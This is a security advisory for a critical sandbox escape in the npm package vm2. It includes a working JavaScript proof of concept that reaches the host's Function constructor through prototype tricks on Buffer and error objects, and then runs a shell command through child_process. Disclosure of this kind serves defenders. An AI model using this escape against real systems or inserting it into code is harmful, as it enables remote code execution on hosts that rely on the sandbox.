CRITICAL 10.0 npm
vm2 has a Sandbox Escape issue
GHSA-v6mx-mf47-r5wg · CVE-2026-47131
Description
Summary
Combining Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"), Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"), and Node.js's ERR_INVALID_ARG_TYPE error lets sandboxed code obtain the host's TypeError constructor, which allows it to escape the sandbox.
This allows attackers to run arbitrary code.
PoC
"use strict";
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
  "use strict";
  const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
  const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");
  async function f() {
    try {
      await WebAssembly.compileStreaming();
    } catch(e) {
      setProto.call(getProto.call(e), null);
    }
    try {
      await WebAssembly.compileStreaming();
    } catch(e) {
      const HostFunction = e.constructor.constructor;
      new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
    }
  }
  f();
`);
Impact
Sandbox Escape → RCE
References
- WEB https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-47131
- WEB https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8
- PACKAGE https://github.com/patriksimek/vm2
- WEB https://github.com/patriksimek/vm2/releases/tag/v3.11.4